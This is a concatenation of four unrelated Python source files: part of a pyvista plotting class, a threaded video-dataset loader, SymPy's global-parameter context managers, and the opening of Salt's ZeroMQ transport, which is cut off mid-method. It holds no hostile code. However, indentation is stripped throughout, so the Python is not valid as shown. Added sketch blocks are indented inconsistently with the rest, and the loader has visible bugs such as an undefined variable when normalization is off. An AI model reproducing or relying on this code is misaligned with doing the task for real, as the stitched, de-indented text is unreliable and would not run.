self.legend.SetPosition2(size[0], size[1])
if bcolor is None:
self.legend.UseBackgroundOff()
else:
self.legend.UseBackgroundOn()
self.legend.SetBackgroundColor(bcolor)
if border:
self.legend.BorderOn()
else:
self.legend.BorderOff()
# Add to renderer
self.add_actor(self.legend, reset_camera=False, name=name, pickable=False)
return self.legend
def set_background(self, color, top=None, all_renderers=True):
"""Set the background color.
Parameters
----------
color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
top : string or 3 item list, optional, defaults to None
If given, this will enable a gradient background where the
``color`` argument is at the bottom and the color given in ``top``
will be the color at the top of the renderer.
all_renderers : bool
If True, applies to all renderers in subplots. If False, then
only applies to the active renderer.
"""
if all_renderers:
for renderer in self.renderers:
renderer.set_background(color, top=top)
else:
self.renderer.set_background(color, top=top)
def remove_legend(self):
"""Remove the legend actor."""
if hasattr(self, 'legend'):
self.remove_actor(self.legend, reset_camera=False)
self.render()
def generate_orbital_path(self, factor=3., n_points=20, viewup=None, shift=0.0):
"""Generate an orbital path around the data scene.
Parameters
----------
factor : float
A scaling factor when building the orbital extent
n_points : int
number of points on the orbital path
viewup : list(float)
the normal to the orbital plane
shift : float, optional
shift the plane up/down from the center of the scene by this amount
"""
if viewup is None:
viewup = rcParams['camera']['viewup']
center = np.array(self.center)
bnds = np.array(self.bounds)
radius = (bnds[1] - bnds[0]) * factor
y = (bnds[3] - bnds[2]) * factor
if y > radius:
radius = y
center += np.array(viewup) * shift
return pyvista.Polygon(center=center, radius=radius, normal=viewup, n_sides=n_points)
def fly_to(self, point):
"""Move the current camera's focal point to a position point.
The movement is animated over the number of frames specified in
NumberOfFlyFrames. The LOD desired frame rate is used.
"""
if not hasattr(self, 'iren'):
raise AttributeError('This plotter does not have an interactive window')
return self.iren.FlyTo(self.renderer, *point)
def orbit_on_path(self, path=None, focus=None, step=0.5, viewup=None,
bkg=True, write_frames=False):
"""Orbit on the given path focusing on the focus point.
Parameters
----------
path : pyvista.PolyData
Path of orbital points. The order of the points is the order of
travel.
focus : list(float) of length 3, optional
The point to focus the camera on.
step : float, optional
The timestep between flying to each camera position
viewup : list(float)
the normal to the orbital plane
write_frames : bool
Assume a file is open and write a frame on each camera view during
the orbit.
"""
if focus is None:
focus = self.center
if viewup is None:
viewup = rcParams['camera']['viewup']
if path is None:
path = self.generate_orbital_path(viewup=viewup)
if not is_pyvista_dataset(path):
path = pyvista.PolyData(path)
points = path.points
# Make sure the whole scene is visible
self.camera.SetThickness(path.length)
def orbit():
"""Define the internal thread for running the orbit."""
for point in points:
self.set_position(point)
self.set_focus(focus)
self.set_viewup(viewup)
self.renderer.ResetCameraClippingRange()
self.render()
if bkg:
time.sleep(step)
if write_frames:
self.write_frame()
if bkg and isinstance(self, pyvista.BackgroundPlotter):
thread = Thread(target=orbit)
thread.start()
else:
bkg = False
orbit()
return
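# A hedged end-to-end sketch combining ``generate_orbital_path``, ``open_gif``
# and ``orbit_on_path`` (the filename, point count and shift are arbitrary, and
# keeping the window alive with ``show(auto_close=False)`` is an assumption):
#     >>> import pyvista
#     >>> pl = pyvista.Plotter(off_screen=True)
#     >>> _ = pl.add_mesh(pyvista.Sphere())
#     >>> _ = pl.show(auto_close=False)  # doctest:+SKIP
#     >>> path = pl.generate_orbital_path(n_points=36, shift=0.2)  # doctest:+SKIP
#     >>> pl.open_gif('orbit.gif')  # doctest:+SKIP
#     >>> pl.orbit_on_path(path, write_frames=True)  # doctest:+SKIP
#     >>> pl.close()  # doctest:+SKIP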
def export_vtkjs(self, filename, compress_arrays=False):
"""Export the current rendering scene as a VTKjs scene.
It can be used for rendering in a web browser.
"""
if not hasattr(self, 'ren_win'):
raise RuntimeError('Export must be called before showing/closing the scene.')
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
else:
filename = os.path.abspath(os.path.expanduser(filename))
return export_plotter_vtkjs(self, filename, compress_arrays=compress_arrays)
def export_obj(self, filename):
"""Export scene to OBJ format."""
if not hasattr(self, "ren_win"):
raise RuntimeError("This plotter must still have a render window open.")
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
else:
filename = os.path.abspath(os.path.expanduser(filename))
exporter = vtk.vtkOBJExporter()
exporter.SetFilePrefix(filename)
exporter.SetRenderWindow(self.ren_win)
return exporter.Write()
def __del__(self):
"""Delete the plotter."""
if not self._closed:
self.close()
self.deep_clean()
del self.renderers
def add_background_image(self, image_path, scale=1, auto_resize=True,
as_global=True):
"""Add a background image to a plot.
Parameters
----------
image_path : str
Path to an image file.
scale : float, optional
Scale the image larger or smaller relative to the size of
the window. For example, a scale size of 2 will make the
largest dimension of the image twice as large as the
largest dimension of the render window. Defaults to 1.
auto_resize : bool, optional
Resize the background when the render window changes size.
as_global : bool, optional
When multiple render windows are present, setting
``as_global=False`` will cause the background to only
appear in one window.
Examples
--------
>>> import pyvista
>>> from pyvista import examples
>>> plotter = pyvista.Plotter()
>>> actor = plotter.add_mesh(pyvista.Sphere())
>>> plotter.add_background_image(examples.mapfile)
>>> plotter.show() # doctest:+SKIP
"""
# verify no render exists
if self._background_renderers[self._active_renderer_index] is not None:
raise RuntimeError('A background image already exists. '
'Remove it with remove_background_image '
'before adding one')
# Need to change the number of layers to support an additional
# background layer
self.ren_win.SetNumberOfLayers(2)
if as_global:
for renderer in self.renderers:
renderer.SetLayer(1)
view_port = None
else:
self.renderer.SetLayer(1)
view_port = self.renderer.GetViewport()
renderer = BackgroundRenderer(self, image_path, scale, view_port)
self.ren_win.AddRenderer(renderer)
self._background_renderers[self._active_renderer_index] = renderer
# setup autoscaling of the image
if auto_resize and hasattr(self, 'iren'): # pragma: no cover
self._add_observer('ModifiedEvent', renderer.resize)
def remove_background_image(self):
"""Remove the background image from the current subplot."""
renderer = self._background_renderers[self._active_renderer_index]
if renderer is None:
raise RuntimeError('No background image to remove at this subplot')
renderer.deep_clean()
self._background_renderers[self._active_renderer_index] = None
class Plotter(BasePlotter):
"""Plotting object to display vtk meshes or numpy arrays.
Example
-------
>>> import pyvista
>>> from pyvista import examples
>>> mesh = examples.load_hexbeam()
>>> another_mesh = examples.load_uniform()
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(mesh, color='red')
>>> _ = plotter.add_mesh(another_mesh, color='blue')
>>> plotter.show() # doctest:+SKIP
Parameters
----------
off_screen : bool, optional
Renders off screen when True. Useful for automated screenshots.
notebook : bool, optional
When True, the resulting plot is placed inline in a Jupyter notebook.
Assumes a Jupyter console is active. Automatically enables off_screen.
shape : list or tuple, optional
Number of sub-render windows inside of the main window.
Specify two across with ``shape=(2, 1)`` and a two by two grid
with ``shape=(2, 2)``. By default there is only one render window.
Can also accept a shape as string descriptor. E.g.:
shape="3|1" means 3 plots on the left and 1 on the right,
shape="4/2" means 4 plots on top of 2 at bottom.
border : bool, optional
Draw a border around each render window. Default False.
border_color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
window_size : list, optional
Window size in pixels. Defaults to [1024, 768]
multi_samples : int
The number of multi-samples used to mitigate aliasing. 4 is a good
default but 8 will have better results with a potential impact on
performance.
line_smoothing : bool
If True, enable line smoothing
point_smoothing : bool
If True, enable point smoothing
polygon_smoothing : bool
If True, enable polygon smoothing
"""
last_update_time = 0.0
right_timer_id = -1
def __init__(self, off_screen=None, notebook=None, shape=(1, 1),
border=None, border_color='k', border_width=2.0,
window_size=None, multi_samples=None, line_smoothing=False,
point_smoothing=False, polygon_smoothing=False,
splitting_position=None, title=None):
"""Initialize a vtk plotting object."""
super(Plotter, self).__init__(shape=shape, border=border,
border_color=border_color,
border_width=border_width,
splitting_position=splitting_position,
title=title)
log.debug('Initializing')
def on_timer(iren, event_id):
"""Exit application if interactive renderer stops."""
if event_id == 'TimerEvent':
self.iren.TerminateApp()
if off_screen is None:
off_screen = pyvista.OFF_SCREEN
if notebook is None:
notebook = scooby.in_ipykernel()
self.notebook = notebook
if self.notebook:
off_screen = True
self.off_screen = off_screen
if window_size is None:
window_size = rcParams['window_size']
self.__prior_window_size = window_size
if multi_samples is None:
multi_samples = rcParams['multi_samples']
# initialize render window
self.ren_win = vtk.vtkRenderWindow()
self.ren_win.SetMultiSamples(multi_samples)
self.ren_win.SetBorders(True)
if line_smoothing:
self.ren_win.LineSmoothingOn()
if point_smoothing:
self.ren_win.PointSmoothingOn()
if polygon_smoothing:
self.ren_win.PolygonSmoothingOn()
for renderer in self.renderers:
self.ren_win.AddRenderer(renderer)
if self.off_screen:
self.ren_win.SetOffScreenRendering(1)
else: # Allow user to interact
self.iren = vtk.vtkRenderWindowInteractor()
self.iren.LightFollowCameraOff()
self.iren.SetDesiredUpdateRate(30.0)
self.iren.SetRenderWindow(self.ren_win)
self.enable_trackball_style()
self._observers = {} # Map of events to observers of self.iren
self._add_observer("KeyPressEvent", self.key_press_event)
self.update_style()
# Set background
self.set_background(rcParams['background'])
# Set window size
self.window_size = window_size
# add timer event if interactive render exists
self._add_observer(vtk.vtkCommand.TimerEvent, on_timer)
if rcParams["depth_peeling"]["enabled"]:
if self.enable_depth_peeling():
for renderer in self.renderers:
renderer.enable_depth_peeling()
def show(self, title=None, window_size=None, interactive=True,
auto_close=None, interactive_update=False, full_screen=False,
screenshot=False, return_img=False, use_panel=None, cpos=None,
height=400):
"""Display the plotting window.
Notes
-----
Please use the ``q``-key to close the plotter as some operating systems
(namely Windows) will experience issues saving a screenshot if the
exit button in the GUI is pressed.
Parameters
----------
title : string, optional
Title of plotting window.
window_size : list, optional
Window size in pixels. Defaults to [1024, 768]
interactive : bool, optional
Enabled by default. Allows user to pan and move figure.
auto_close : bool, optional
Enabled by default. Exits plotting session when user
closes the window when interactive is True.
interactive_update : bool, optional
Disabled by default. Allows the user to draw without blocking;
the user should call ``update()`` in each iteration.
full_screen : bool, optional
Opens window in full screen. When enabled, ignores
window_size. Default False.
use_panel : bool, optional
If False, the interactive rendering from panel will not be used in
notebooks
cpos : list(tuple(floats))
The camera position to use
height : int, optional
height for panel pane. Only used with panel.
Return
------
cpos : list
List of camera position, focal point, and view up
"""
if use_panel is None:
use_panel = rcParams['use_panel']
if auto_close is None:
auto_close = rcParams['auto_close']
if not hasattr(self, "ren_win"):
raise RuntimeError("This plotter has been closed and cannot be shown.")
# reset the camera on the first render unless the camera has already been set
if self._first_time: # and not self.camera_set:
for renderer in self.renderers:
if not renderer.camera_set and cpos is None:
renderer.camera_position = renderer.get_default_cam_pos()
renderer.ResetCamera()
elif cpos is not None:
renderer.camera_position = cpos
self._first_time = False
if full_screen:
self.ren_win.SetFullScreen(True)
self.ren_win.BordersOn() # super buggy when disabled
else:
if window_size is None:
window_size = self.window_size
self.ren_win.SetSize(window_size[0], window_size[1])
# Render
log.debug('Rendering')
self.render()
# This has to be after the first render for some reason
if title is None:
title = self.title
if title:
self.ren_win.SetWindowName(title)
self.title = title
# Keep track of image for sphinx-gallery
self.last_image = self.screenshot(screenshot, return_img=True)
self.last_image_depth = self.get_image_depth()
disp = None
self.update() # For Windows issues. Resolves #186
# See: https://github.com/pyvista/pyvista/issues/186#issuecomment-550993270
if interactive and (not self.off_screen):
try: # interrupts will be caught here
log.debug('Starting iren')
self.update_style()
self.iren.Initialize()
if not interactive_update:
self.iren.Start()
except KeyboardInterrupt:
log.debug('KeyboardInterrupt')
self.close()
raise KeyboardInterrupt
elif self.notebook and use_panel and not hasattr(self, 'volume'):
try:
from panel.pane import VTK as panel_display
disp = panel_display(self.ren_win, sizing_mode='stretch_width',
height=height)
except:
pass
# In the event that the user hits the exit-button on the GUI (on
# Windows OS) then it must be finalized and deleted as accessing it
# will kill the kernel.
# Here we check for that and clean it up before moving on to any of
# the closing routines that might try to still access that
# render window.
if not self.ren_win.IsCurrent():
self._clear_ren_win() # The ren_win is deleted
# proper screenshots cannot be saved if this happens
if not auto_close:
warnings.warn("`auto_close` ignored: by clicking the exit button, you have destroyed the render window and we have to close it out.")
auto_close = True
# NOTE: after this point, nothing from the render window can be accessed
# as if a user pressed the close button, then it destroys the
# render view and a stream of errors will kill the Python
# kernel if code here tries to access that renderer.
# See issues #135 and #186 for insight before editing the
# remainder of this function.
# Get camera position before closing
cpos = self.camera_position
# NOTE: our conversion to panel currently does not support multi-view
# so we should display the static screenshot in notebooks for
# multi-view plots until we implement this feature
# If notebook is true and panel display failed:
if self.notebook and (disp is None or self.shape != (1, 1)):
import PIL.Image
# sanity check
try:
import IPython
except ImportError:
raise Exception('Install IPython to display image in a notebook')
disp = IPython.display.display(PIL.Image.fromarray(self.last_image))
# Cleanup
if auto_close:
self.close()
# Return the notebook display: either panel object or image display
if self.notebook:
return disp
# If user asked for screenshot, return as numpy array after camera
# position
if return_img or screenshot is True:
return cpos, self.last_image
# default to returning last used camera position
return cpos
def plot(self, *args, **kwargs):
"""Create a plotting window.
Present for backwards compatibility.
DEPRECATED: Please use `show()` instead.
"""
logging.warning("`.plot()` is deprecated. Please use `.show()` instead.")
return self.show(*args, **kwargs)
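# --- Illustrative usage sketch (added for exposition, not part of the original
# module). A minimal, hedged example of what show() returns when asked for the
# rendered image; it assumes pyvista with an off-screen-capable VTK build, and
# the Sphere mesh and window size are arbitrary placeholders.
def _example_show_usage():
    import pyvista as pv
    plotter = pv.Plotter(off_screen=True)
    plotter.add_mesh(pv.Sphere())
    # With return_img=True both the camera position and the last rendered
    # image (a numpy array) are returned.
    cpos, image = plotter.show(window_size=[400, 300], return_img=True)
    return cpos, image.shape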
|
data.py
|
import os
import cv2
import random
import tempfile
import numpy as np
from queue import Queue  # Python 3 standard library queue
from threading import Thread
from .base_provider import VideosDataset, DataProvider
class Data(VideosDataset):
def __init__(self, name, paths, normalization, sequence_length,
crop_size, num_classes, queue_size):
"""
Args:
name: str, name of the data (train, test or validation)
paths: list, list of string that have the video path and label
information
sequence_length: video clip length
crop_size: `tuple`, image resize size (width, height)
normalization: `str` or None
None: no normalization
divide_255: divide all pixels by 255
divide_256: divide all pixels by 256
num_classes: `integer`, number of classes that the dataset has
queue_size: `integer`, data queue size
"""
self.name = name
self.paths = paths
self.normalization = normalization
self.sequence_length = sequence_length
self.crop_size = crop_size
self.num_classes = num_classes
self.queue = DataQueue(name, queue_size)
self.examples = None
self._start_data_thread()
def get_frames_data(self, filename, num_frames_per_clip=16):
''' Given a directory containing extracted frames, return a video clip of
(num_frames_per_clip) consecutive frames as a list of np arrays
Args
num_frames_per_clip: sequence_length of the video clip
Returns
video: numpy, video clip with shape
[sequence_length, height, width, channels]
'''
video = []
s_index = 0
for parent, dirnames, files in os.walk(filename):
filenames = [fi for fi in files if fi.endswith((".png", ".jpg", ".jpeg"))]
if(len(filenames) < num_frames_per_clip):
return None
suffix = filenames[0].split('.', 1)[1]
filenames_int = [i.split('.', 1)[0] for i in filenames]
filenames_int = sorted(filenames_int)
s_index = random.randint(0, len(filenames) - num_frames_per_clip)
for i in range(s_index, s_index + num_frames_per_clip):
image_name = str(filename) + '/' + str(filenames_int[i]) + '.' + suffix
# print image_name
img = cv2.imread(image_name)
img = cv2.resize(img, self.crop_size)
if self.normalization:
img_data = self.normalize_image(img, self.normalization)
video.append(img_data)
return video
def extract_video_data(self):
''' Single thread to extract video and label information from the dataset
'''
# Generate one random index and extract the corresponding video clip
while True:
index = random.randint(0, len(self.paths)-1)
video_path, label = self.paths[index].strip('\n').split()
video = self.get_frames_data(video_path, self.sequence_length)
if video is not None and len(video) == self.sequence_length:
# Put the video into the queue
video = np.array(video)
label = np.array(int(label))
self.queue.put((video, label))
def _start_data_thread(self):
print("Start thread: %s data preparation ..." % self.name)
self.worker = Thread(target=self.extract_video_data)
self.worker.daemon = True
self.worker.start()
@property
def num_examples(self):
if not self.examples:
# calculate the number of examples
total = 0
for line in self.paths:
video_path, _ = line.strip('\n').split()
for root, dirs, files in os.walk(video_path):
total += len(files)
self.examples = total // self.sequence_length
return self.examples
def next_batch(self, batch_size):
''' Get the next batches of the dataset
Args
batch_size: video batch size
Returns
videos: numpy, shape
[batch_size, sequence_length, height, width, channels]
labels: numpy
[batch_size, num_classes]
'''
videos, labels = self.queue.get(batch_size)
videos = np.array(videos)
labels = np.array(labels)
labels = self.labels_to_one_hot(labels, self.num_classes)
return videos, labels
class DataQueue():
def __init__(self, name, maximum_item, block=True):
"""
Args
name: str, data type name (train, validation or test)
maximum_item: integer, maximum item that this queue can store
block: boolean, block the put or get information if the queue is
full or empty
"""
self._name = name
self.block = block
self.maximum_item = maximum_item
self._queue = Queue(maximum_item)
@property
def queue(self):
# Stored as _queue so this read-only property does not shadow the
# attribute assigned in __init__ (which would fail and recurse).
return self._queue
@property
def name(self):
return self._name
def put(self, data):
self.queue.put(data, self.block)
def get(self, batch_size):
'''
Args:
batch_size: integer, the number of the item you want to get from the queue
Returns:
videos: list, list of numpy data with shape
[sequence_length, height, width, channels]
labels: list, list of integer number
'''
videos = []
labels = []
for i in range(batch_size):
video, label = self.queue.get(self.block)
videos.append(video)
labels.append(label)
return videos, labels
class DataProvider(DataProvider):
def __init__(self, path, num_classes, validation_set=None, test=False,
validation_split=None, normalization=None, crop_size=(64,64),
sequence_length=16, train_queue=None, valid_queue=None,
test_queue=None, train=False, queue_size=300, **kwargs):
"""
Args:
num_classes: the number of the classes
validation_set: `bool`, whether to build a validation queue
validation_split: `int` or None
int: the first `validation_split` entries of the shuffled `train set`
are held out as the `validation set`.
None: if `validation_set` is True, the `validation set` will be a
copy of the `test set`
normalization: `str` or None
None: no normalization
divide_255: divide all pixels by 255
divide_256: divide all pixels by 256
sequence_length: `integer`, video clip length
crop_size: `tuple`, the size that you want to reshape the images, (width, height)
train: `boolean`, whether we need the training queue or not
test: `bool`, whether we need the testing queue or not
queue_size: `integer`, data queue size, default is 300
"""
self._path = path
self._num_classes = num_classes
self._sequence_length = sequence_length
self._crop_size = crop_size
train_videos_labels = self.get_videos_labels_lines(
os.path.join(self._path, 'train.list'))
test_videos_labels = self.get_videos_labels_lines(
os.path.join(self._path, 'test.list'))
if validation_set and validation_split:
random.shuffle(train_videos_labels)
valid_videos_labels = train_videos_labels[:validation_split]
train_videos_labels = train_videos_labels[validation_split:]
self.validation = Data('validation', valid_videos_labels,
normalization, sequence_length,
crop_size, num_classes, queue_size)
if train:
self.train = Data('train', train_videos_labels,
normalization, sequence_length,
crop_size, num_classes, queue_size)
if test:
self.test = Data('test', test_videos_labels,
normalization, sequence_length,
crop_size, num_classes, queue_size)
if validation_set and not validation_split:
self.validation = Data('validation', test_videos_labels,
normalization, sequence_length,
crop_size, num_classes, queue_size)
def get_videos_labels_lines(self, path):
# Open the file according to the filename
lines = open(path, 'r')
lines = list(lines)
new_lines = [os.path.join(self._path, line) for line in lines]
return new_lines
@property
def data_shape(self):
return (self._sequence_length, self._crop_size[1], self._crop_size[0], 3)
@property
def n_classes(self):
return self._num_classes
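# --- Illustrative usage sketch (added for exposition, not part of the original
# module). A minimal, hedged example of wiring up the provider; the dataset
# root below is hypothetical and must contain 'train.list' and 'test.list'
# files whose lines are "<frames_dir> <label>".
def _example_next_batch():
    provider = DataProvider(path='/data/ucf101', num_classes=101,
                            train=True, sequence_length=16,
                            crop_size=(64, 64), queue_size=300)
    videos, labels = provider.train.next_batch(batch_size=8)
    # videos: [8, 16, 64, 64, 3], labels: [8, 101] one-hot
    return videos.shape, labels.shape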
|
parameters.py
|
"""Thread-safe global parameters"""
from .cache import clear_cache
from contextlib import contextmanager
from threading import local
class _global_parameters(local):
"""
Thread-local global parameters.
Explanation
===========
This class generates thread-local container for SymPy's global parameters.
Every global parameter must be passed as a keyword argument when generating
its instance.
A variable, `global_parameters`, is provided as the default instance of this class.
WARNING! Although the global parameters are thread-local, SymPy's cache is not
thread-local yet.
This may lead to undesired results in multi-threaded operations.
Examples
========
>>> from sympy.abc import x
>>> from sympy.core.cache import clear_cache
>>> from sympy.core.parameters import global_parameters as gp
>>> gp.evaluate
True
>>> x+x
2*x
>>> log = []
>>> def f():
... clear_cache()
... gp.evaluate = False
... log.append(x+x)
... clear_cache()
>>> import threading
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
>>> print(log)
[x + x]
>>> gp.evaluate
True
>>> x+x
2*x
References
==========
.. [1] https://docs.python.org/3/library/threading.html
"""
def __init__(self, **kwargs):
self.__dict__.update(kwargs)
def __setattr__(self, name, value):
if getattr(self, name) != value:
clear_cache()
return super().__setattr__(name, value)
global_parameters = _global_parameters(evaluate=True, distribute=True, exp_is_pow=False)
@contextmanager
def evaluate(x):
""" Control automatic evaluation
Explanation
===========
This context manager controls whether or not all SymPy functions evaluate
by default.
Note that much of SymPy expects evaluated expressions. This functionality
is experimental and is unlikely to function as intended on large
expressions.
Examples
========
>>> from sympy.abc import x
>>> from sympy.core.parameters import evaluate
>>> print(x + x)
2*x
>>> with evaluate(False):
... print(x + x)
x + x
"""
old = global_parameters.evaluate
try:
global_parameters.evaluate = x
yield
finally:
global_parameters.evaluate = old
@contextmanager
def distribute(x):
""" Control automatic distribution of Number over Add
Explanation
===========
This context manager controls whether or not Mul distribute Number over
Add. Plan is to avoid distributing Number over Add in all of sympy. Once
that is done, this contextmanager will be removed.
Examples
========
>>> from sympy.abc import x
>>> from sympy.core.parameters import distribute
>>> print(2*(x + 1))
2*x + 2
>>> with distribute(False):
... print(2*(x + 1))
2*(x + 1)
"""
old = global_parameters.distribute
try:
global_parameters.distribute = x
yield
finally:
global_parameters.distribute = old
@contextmanager
def _exp_is_pow(x):
"""
Control whether `e^x` should be represented as ``exp(x)`` or a ``Pow(E, x)``.
Examples
========
>>> from sympy import exp
>>> from sympy.abc import x
>>> from sympy.core.parameters import _exp_is_pow
>>> with _exp_is_pow(True): print(type(exp(x)))
<class 'sympy.core.power.Pow'>
>>> with _exp_is_pow(False): print(type(exp(x)))
exp
"""
old = global_parameters.exp_is_pow
clear_cache()
try:
global_parameters.exp_is_pow = x
yield
finally:
clear_cache()
global_parameters.exp_is_pow = old
|
zeromq.py
|
"""
Zeromq transport classes
"""
import copy
import errno
import hashlib
import logging
import os
import signal
import sys
import threading
import weakref
from random import randint
import salt.auth
import salt.crypt
import salt.ext.tornado
import salt.ext.tornado.concurrent
import salt.ext.tornado.gen
import salt.ext.tornado.ioloop
import salt.log.setup
import salt.payload
import salt.transport.client
import salt.transport.mixins.auth
import salt.transport.server
import salt.utils.event
import salt.utils.files
import salt.utils.minions
import salt.utils.process
import salt.utils.stringutils
import salt.utils.verify
import salt.utils.versions
import salt.utils.zeromq
import zmq.error
import zmq.eventloop.ioloop
import zmq.eventloop.zmqstream
from salt._compat import ipaddress
from salt.exceptions import SaltException, SaltReqTimeoutError
from salt.utils.zeromq import LIBZMQ_VERSION_INFO, ZMQ_VERSION_INFO, zmq
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
try:
from M2Crypto import RSA
HAS_M2 = True
except ImportError:
HAS_M2 = False
try:
from Cryptodome.Cipher import PKCS1_OAEP
except ImportError:
from Crypto.Cipher import PKCS1_OAEP # nosec
log = logging.getLogger(__name__)
def _get_master_uri(master_ip, master_port, source_ip=None, source_port=None):
"""
Return the ZeroMQ URI to connect the Minion to the Master.
It supports different source IP / port, given the ZeroMQ syntax:
// Connecting using a IP address and bind to an IP address
rc = zmq_connect(socket, "tcp://192.168.1.17:5555;192.168.1.1:5555"); assert (rc == 0);
Source: http://api.zeromq.org/4-1:zmq-tcp
"""
from salt.utils.zeromq import ip_bracket
master_uri = "tcp://{master_ip}:{master_port}".format(
master_ip=ip_bracket(master_ip), master_port=master_port
)
if source_ip or source_port:
if LIBZMQ_VERSION_INFO >= (4, 1, 6) and ZMQ_VERSION_INFO >= (16, 0, 1):
# The source:port syntax for ZeroMQ has been added in libzmq 4.1.6
# which is included in the pyzmq wheels starting with 16.0.1.
if source_ip and source_port:
master_uri = (
"tcp://{source_ip}:{source_port};{master_ip}:{master_port}".format(
source_ip=ip_bracket(source_ip),
source_port=source_port,
master_ip=ip_bracket(master_ip),
master_port=master_port,
)
)
elif source_ip and not source_port:
master_uri = "tcp://{source_ip}:0;{master_ip}:{master_port}".format(
source_ip=ip_bracket(source_ip),
master_ip=ip_bracket(master_ip),
master_port=master_port,
)
elif source_port and not source_ip:
ip_any = (
"0.0.0.0"
if ipaddress.ip_address(master_ip).version == 4
else ip_bracket("::")
)
master_uri = (
"tcp://{ip_any}:{source_port};{master_ip}:{master_port}".format(
ip_any=ip_any,
source_port=source_port,
master_ip=ip_bracket(master_ip),
master_port=master_port,
)
)
else:
log.warning(
"Unable to connect to the Master using a specific source IP / port"
)
log.warning("Consider upgrading to pyzmq >= 16.0.1 and libzmq >= 4.1.6")
log.warning(
"Specific source IP / port for connecting to master returner port:"
" configuration ignored"
)
return master_uri
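# --- Illustrative sketch (added for exposition, not part of the original
# module). A minimal, hedged example of the URIs _get_master_uri builds; the
# IP addresses and ports below are hypothetical.
def _example_master_uris():
    # Plain master URI: tcp://192.168.1.17:4506
    plain = _get_master_uri("192.168.1.17", 4506)
    # Pinned source IP and port (only honoured with libzmq >= 4.1.6 and
    # pyzmq >= 16.0.1): tcp://192.168.1.1:5555;192.168.1.17:4506
    pinned = _get_master_uri(
        "192.168.1.17", 4506, source_ip="192.168.1.1", source_port=5555
    )
    return plain, pinned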
class AsyncZeroMQReqChannel(salt.transport.client.ReqChannel):
"""
Encapsulate sending routines to ZeroMQ.
ZMQ Channels default to 'crypt=aes'
"""
# This class is only a singleton per minion/master pair
# mapping of io_loop -> {key -> channel}
instance_map = weakref.WeakKeyDictionary()
async_methods = [
"crypted_transfer_decode_dictentry",
"_crypted_transfer",
"_do_transfer",
"_uncrypted_transfer",
"send",
]
close_methods = [
"close",
]
def __new__(cls, opts, **kwargs):
"""
Only create one instance of channel per __key()
"""
# do we have any mapping for this io_loop
io_loop = kwargs.get("io_loop")
if io_loop is None:
io_loop = salt.ext.tornado.ioloop.IOLoop.current()
if io_loop not in cls.instance_map:
cls.instance_map[io_loop] = weakref.WeakValueDictionary()
loop_instance_map = cls.instance_map[io_loop]
key = cls.__key(opts, **kwargs)
obj = loop_instance_map.get(key)
if obj is None:
log.debug("Initializing new AsyncZeroMQReqChannel for %s", key)
# we need to make a local variable for this, as we are going to store
# it in a WeakValueDictionary-- which will remove the item if no one
# references it-- this forces a reference while we return to the caller
obj = object.__new__(cls)
obj.__singleton_init__(opts, **kwargs)
obj._instance_key = key
loop_instance_map[key] = obj
obj._refcount = 1
obj._refcount_lock = threading.RLock()
log.trace(
"Inserted key into loop_instance_map id %s for key %s and process %s",
id(loop_instance_map),
key,
os.getpid(),
)
else:
with obj._refcount_lock:
obj._refcount += 1
log.debug("Re-using AsyncZeroMQReqChannel for %s", key)
return obj
def __deepcopy__(self, memo):
cls = self.__class__
# pylint: disable=too-many-function-args
result = cls.__new__(cls, copy.deepcopy(self.opts, memo))
# pylint: enable=too-many-function-args
memo[id(self)] = result
for key in self.__dict__:
if key in ("_io_loop", "_refcount", "_refcount_lock"):
continue
# The _io_loop has a thread Lock which will fail to be deep
# copied. Skip it because it will just be recreated on the
# new copy.
if key == "message_client":
# Recreate the message client because it will fail to be deep
# copied. The reason is the same as the io_loop skip above.
setattr(
result,
key,
AsyncReqMessageClientPool(
result.opts,
args=(
result.opts,
self.master_uri,
),
kwargs={"io_loop": self._io_loop},
),
)
continue
setattr(result, key, copy.deepcopy(self.__dict__[key], memo))
return result
@classmethod
def force_close_all_instances(cls):
"""
Will force close all instances
ZMQ can hang on quit if left to deconstruct on its own.
This is because it deconstructs out of order.
:return: None
"""
for weak_dict in list(cls.instance_map.values()):
for instance in list(weak_dict.values()):
instance.close()
@classmethod
def __key(cls, opts, **kwargs):
return (
opts["pki_dir"], # where the keys are stored
opts["id"], # minion ID
kwargs.get("master_uri", opts.get("master_uri")), # master ID
kwargs.get("crypt", "aes"), # TODO: use the same channel for crypt
)
# has to remain empty for singletons, since __init__ will *always* be called
def __init__(self, opts, **kwargs):
pass
# an init for the singleton instance to call
def __singleton_init__(self, opts, **kwargs):
self.opts = dict(opts)
self.ttype = "zeromq"
# crypt defaults to 'aes'
self.crypt = kwargs.get("crypt", "aes")
if "master_uri" in kwargs:
self.opts["master_uri"] = kwargs["master_uri"]
self._io_loop = kwargs.get("io_loop")
if self._io_loop is None:
self._io_loop = salt.ext.tornado.ioloop.IOLoop.current()
if self.crypt != "clear":
# we don't need to worry about auth as a kwarg, since its a singleton
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self._io_loop)
log.debug(
"Connecting the Minion to the Master URI (for the return server): %s",
self.master_uri,
)
self.message_client = AsyncReqMessageClientPool(
self.opts,
args=(
self.opts,
self.master_uri,
),
kwargs={"io_loop": self._io_loop},
)
self._closing = False
def close(self):
"""
Since the message_client creates sockets and assigns them to the IOLoop we have to
specifically destroy them, since we aren't the only ones with references to the FDs
"""
if self._closing:
return
if self._refcount > 1:
# Decrease refcount
with self._refcount_lock:
self._refcount -= 1
log.debug(
"This is not the last %s instance. Not closing yet.",
self.__class__.__name__,
)
return
log.debug("Closing %s instance", self.__class__.__name__)
self._closing = True
if hasattr(self, "message_client"):
self.message_client.close()
# Remove the entry from the instance map so that a closed entry may not
# be reused.
# This forces this operation even if the reference count of the entry
# has not yet gone to zero.
if self._io_loop in self.__class__.instance_map:
loop_instance_map = self.__class__.instance_map[self._io_loop]
if self._instance_key in loop_instance_map:
del loop_instance_map[self._instance_key]
if not loop_instance_map:
del self.__class__.instance_map[self._io_loop]
# pylint: disable=W1701
def __del__(self):
